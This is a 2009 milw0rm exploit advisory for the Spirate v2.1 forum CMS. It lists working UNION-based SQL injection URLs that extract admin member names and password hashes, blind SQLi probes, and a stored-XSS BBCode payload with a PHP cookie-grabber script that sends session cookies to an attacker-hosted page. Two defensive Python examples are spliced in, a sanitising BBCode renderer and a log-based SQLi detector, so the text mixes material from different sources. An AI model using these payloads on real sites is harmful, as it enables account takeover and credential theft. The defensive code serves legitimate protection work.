Small Pirate v2.1 XSSSQL Multiple Remote Vulnerabilities

***********************************************************************************************
***********************************************************************************************
**                                                                                           **
**                                                                                           **
**     [] [] [] [][][][> []       [] [][ ][]       []   [][]] [] [> [][][][> [][][][]        **
**     || || || []         [][]   []   [] []      []   []      [] []   []        []    []    **
** [> [][][][] [][][][> [] [] []       [] []    [][] []        [][]    [][][][> []     []    **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[>    []     []        []   [][]   [] [] [][][] []         [][]    []           [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
   [>   [[[]]]   [][][][> [][]    [] [][[] [[]] [][] [][][] [] [> [][][][> <][]        []    **
**                                                                                           **
**                                                                                           **
**                    LONG LIVE SPAIN!... WE'LL WIN THE WORLD CUP!... o.O                    **
**                                   PROUD TO BE SPANISH!                                    **
**                                                                                           **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|                                 MULTIPLE REMOTE VULNERABILITIES                            |
|--------------------------------------------------------------------------------------------|
|                                   |     Small Pirates v-2.1    |                           |
| CMS INFORMATION:                    --------------------------                             |
|                                                                                            |
|-->WEB: http://spirate.net/foro/                                                            |
|-->DOWNLOAD: http://spirate.net/foro/                                                       |
|-->DEMO: http://www.santiagoescraches.com.ar/index.php                                      |
|-->CATEGORY: CMS / Board                                                                    |
|                                                                                            |
| CMS VULNERABILITY:                                                                         |
|                                                                                            |
|-->TESTED ON: Firefox 3                                                                     |
|-->DORK: "Basado en Spirate"                                                                |
|-->CATEGORY: SQL INJECTION VULNERABILITIES / COOKIE STEALING / BLIND SQL INJECTION          |
|-->AFFECTED VERSION: <= 2.1                                                                 |
|-->Discovered bug date: 2009-05-10                                                          |
|-->Reported bug date: 2009-05-10                                                            |
|-->Fixed bug date: N/A                                                                      |
|-->Info patch: Not fixed                                                                    |
|-->Author: YEnH4ckEr                                                                        |
|-->mail: y3nh4ck3r[at]gmail[dot]com                                                         |
|-->WEB/BLOG: N/A                                                                            |
|-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD)   |
|            for their support.                                                              |
|-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (Love you, little one!)        |
----------------------------------------------------------------------------------------------

#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>


-------
INTRO:
-------

This system is a combination of several components.

Info by admin (quote):

"cw* = SMF + packages"
"Spirate = cw + additions + repairs + fixes"

"*cw = casitaweb."


-------------------
PROOFS OF CONCEPT:
-------------------

[++] GET var --> 'id'

[++] File vuln --> 'pag1.php'

~~~~> http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,version(),5,6/*


[++] GET var --> 'id'

[++] File vuln --> 'pag1-guest.php'

~~~~> http://[HOST]/pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(user(),0x3A3A3A,database()),5,6/*


[++] GET var --> 'id'

[++] File vuln --> 'rss-coment_post.php'

[++] Note --> More info in source code

~~~~> http://[HOST]/web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat(user(),0x3A3A,database()),4,5,6,version(),8/*


[++] GET var --> 'id'

[++] File vuln --> 'rss-pic-comment.php'

[++] Note --> More info in source code

~~~~> http://[HOST]/web/rss/rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4,current_user(),6,user(),8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81/*


[++[Return]++] ~~~~~> user, version and database.
  119
  120
  121   −−−−−−−−−−
  122   EXPLOITS:
  123   −−−−−−−−−−
  124
  125
  126   ~~~~> http://[HOST]/pag1.php?id=−1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_members+WHE
        RE+ID_MEMBER=1/*
  127
  128   ~~~~> http://[HOST]/pag1−guest.php?id=−1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_membe
        rs+WHERE+ID_MEMBER=1/*
  129
  130   ~~~~> http://[HOST]/web/rss/rss−coment_post.php?id=−1+UNION+ALL+SELECT+1,2,concat(memberName,0x3A3A3A,passwd),4,5,6,c
        oncat(memberName,0x3A3A3A,passwd),8+FROM+smf_members+WHERE+ID_MEMBER=1/*
  131
  132   ~~~~> http://[HOST]/web/rss/rss−pic−comment.php?id=−1+UNION+ALL+SELECT+1,2,3,4,concat(memberName,0x3A3A3A,passwd),6,c
        oncat(memberName,0x3A3A3A,passwd),8,9,concat(memberName,0x3A3A3A,passwd),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
        ,26,27,28,29,concat(memberName,0x3A3A3A,passwd),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,
        54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81+FROM+smf_members+WHERE+ID_MEMBER=
        1/*
  133
  134
  135   [++[Return]++] ~~~~~> memberName:::passwd in ’members’ table
  136
  137
  138
  139   ######################################
  140   //////////////////////////////////////
  141
  142   COOKIE STEALING VULN (BYPASS BBCODE):
  143
  144   //////////////////////////////////////
  145   ######################################
  146


<<<<---------++++++++++++++ Condition: Post a comment +++++++++++++++++--------->>>>


-------
INTRO:
-------

This system is a combination of several components.

Info by admin (quote):

"cw* = SMF + packages"
"Spirate = cw + additions + repairs + fixes"

"*cw = casitaweb."


-------------------
PROOF OF CONCEPT:
-------------------

[url][img]http://www.google.es onmouseover=while(true){alert(1);} [/img][/url]


[++[Return]++] ~~~~~> recursive alert message saying "1"


----------
EXPLOIT:
----------

Cookie Grabber Script --> capturethecookies.php

Example script (create exploited.txt beforehand):

<?php
$ck=$_GET["ck"]; //Capture the cookies
$manejador=fopen("exploited.txt",'a');
fwrite($manejador, "Cookie:\r\n".htmlentities($ck)."\r\n--EOF--\r\n"); //Save the values
fclose($manejador);
echo "<script>location.href='http://[HOST]/index.php';</script>"; //Redirect...
?>

Example hosting --> http://www.myphpcookiestealing.es/capturethecookies.php?ck=

Poisoned comment:

[url][img]http://www.owned.owned onmouseover=document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,109,121,112,104,112,99,111,111,107,105,101,115,116,101,97,108,105,110,103,46,101,115,47,99,97,112,116,117,114,101,116,104,101,99,111,111,107,105,101,115,46,112,104,112,63,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61)+document.cookie [/img][/url]


[++[Return]++] ~~~~~> Cookie and PHPSESSID in exploited.txt
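The BBCode bypass above only works if the body of the [img] tag reaches the src attribute unvalidated and unquoted, so a space in the "URL" starts a new attribute. As an added defensive example (not code from the advisory, from Spirate or from SMF), here is a minimal BBCode [img] renderer in Python: it HTML-escapes the whole post first, accepts only a bare absolute http(s) URL with no whitespace or quote characters, and emits the attribute quoted, so the advisory's payload and a javascript: URL both come back as inert text. The sample posts are constructed inline; the first one is the advisory's own payload.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample posts: the advisory's payload, a benign image, and a javascript: URL.
SAMPLE_POSTS = [
    "[url][img]http://www.google.es onmouseover=while(true){alert(1);} [/img][/url]",
    "[img]https://example.org/avatar.png[/img]",
    "[img]javascript:alert(1)[/img]",
]

IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def is_safe_image_url(candidate):
    """Accept only a bare absolute http(s) URL that cannot close or extend an HTML attribute."""
    if not candidate or any(ch.isspace() for ch in candidate):
        return False                      # a space is exactly how the advisory's payload breaks out
    if any(ch in candidate for ch in "\"'<>"):
        return False
    parts = urlsplit(candidate)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_bbcode(post):
    """Escape the post, then turn [img] tags with safe URLs into quoted <img> elements."""
    escaped = html.escape(post, quote=True)   # '&', '<', '>', '"' and "'" are now entities

    def replace_img(match):
        url = html.unescape(match.group(1)).strip()
        if not is_safe_image_url(url):
            return match.group(0)             # keep the tag as harmless escaped text
        return '<img src="%s" alt="">' % html.escape(url, quote=True)

    return IMG_TAG.sub(replace_img, escaped)


if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print(render_bbcode(post))
```

Run it directly to see the three sample posts; only the second becomes an `<img>` element. Independently of the renderer, enabling PHP's `session.cookie_httponly` keeps `document.cookie` from exposing PHPSESSID to injected script, which blunts the cookie-grabber stage even where an injection itself succeeds.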


###########################
///////////////////////////

BLIND SQL INJECTION (SQLi):

///////////////////////////
###########################


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>


-------
INTRO:
-------

This system is a combination of several components.

Info by admin (quote):

"cw* = SMF + packages"
"Spirate = cw + additions + repairs + fixes"

"*cw = casitaweb."


-------------------
PROOFS OF CONCEPT:
-------------------

[++] GET var --> 'id'

[++] File vuln --> 'index.php'

~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=1 --> TRUE

~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=0 --> FALSE


----------
EXPLOITS:
----------

~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=5 --> TRUE

~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=4 --> FALSE

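Both the UNION-based requests in the SQL INJECTION section and the boolean probes in this section leave a clear trace in the web server's access log. The following is an added detection example in Python (not part of the advisory and not Spirate/SMF code): it parses Apache combined-format lines, URL-decodes the request target, flags UNION SELECT, MySQL information functions, comment terminators and AND-based probes, and then groups boolean probes per client and endpoint so that a true/false pair answered with different response sizes, the oracle the blind-SQLi requests above rely on, stands out. The log lines, client addresses and byte counts are constructed to mirror the advisory's requests.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format lines modelled on the advisory's requests (no real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [29/May/2009:10:01:02 +0200] "GET /pag1.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [29/May/2009:10:01:09 +0200] "GET /pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,version(),5,6/* HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
10.0.0.5 - - [29/May/2009:10:02:15 +0200] "GET /web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat(user(),0x3A3A,database()),4,5,6,version(),8/* HTTP/1.1" 200 3110 "-" "Mozilla/5.0"
10.0.0.7 - - [29/May/2009:10:05:00 +0200] "GET /?type=rss;action=.xml;sa=comentarios;id=7+and+1=1 HTTP/1.1" 200 2200 "-" "curl/7.19"
10.0.0.7 - - [29/May/2009:10:05:01 +0200] "GET /?type=rss;action=.xml;sa=comentarios;id=7+and+1=0 HTTP/1.1" 200 410 "-" "curl/7.19"
10.0.0.7 - - [29/May/2009:10:05:30 +0200] "GET /?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=5 HTTP/1.1" 200 2200 "-" "curl/7.19"
10.0.0.9 - - [29/May/2009:10:06:00 +0200] "GET /index.php?topic=12.0 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# One combined-format line: client, timestamp, method, request target, status, response size.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

# Request shapes seen in the advisory, matched against the decoded target (case-insensitive).
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "info_functions": re.compile(r"\b(?:version|user|current_user|database)\s*\(\s*\)|@@version", re.I),
    "boolean_probe": re.compile(r"\band\s+(?:\d+\s*=\s*\d+|substring\s*\()", re.I),
    "comment_terminator": re.compile(r"/\*\s*$|--\s"),
}


def scan_log(log_text):
    """Return one finding per request whose decoded target matches at least one signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, method, target, status, size = m.groups()
        decoded = unquote_plus(target)          # '+' and %XX become the characters the DB sees
        hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if hits:
            findings.append({
                "ip": ip, "time": ts, "method": method, "target": decoded,
                "status": int(status), "bytes": 0 if size == "-" else int(size),
                "signatures": hits,
            })
    return findings


def boolean_probe_endpoints(findings):
    """Group boolean probes by (client, path); more than one distinct response size for the
    same endpoint is the true/false oracle that blind injection depends on."""
    sizes = {}
    for f in findings:
        if "boolean_probe" not in f["signatures"]:
            continue
        key = (f["ip"], urlsplit(f["target"]).path)
        sizes.setdefault(key, set()).add(f["bytes"])
    return {key: sorted(s) for key, s in sizes.items() if len(s) > 1}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["bytes"], ",".join(f["signatures"]), f["target"])
    print("blind-SQLi oracles:", boolean_probe_endpoints(found))
```

The decode step matters: the advisory's requests use `+` for spaces and would slip past a signature applied to the raw target. The size grouping is deliberately simple; in production the same idea is usually applied per session over a time window rather than over a whole file.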

<<<-------------------------------EOF---------------------------------->>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-05-29]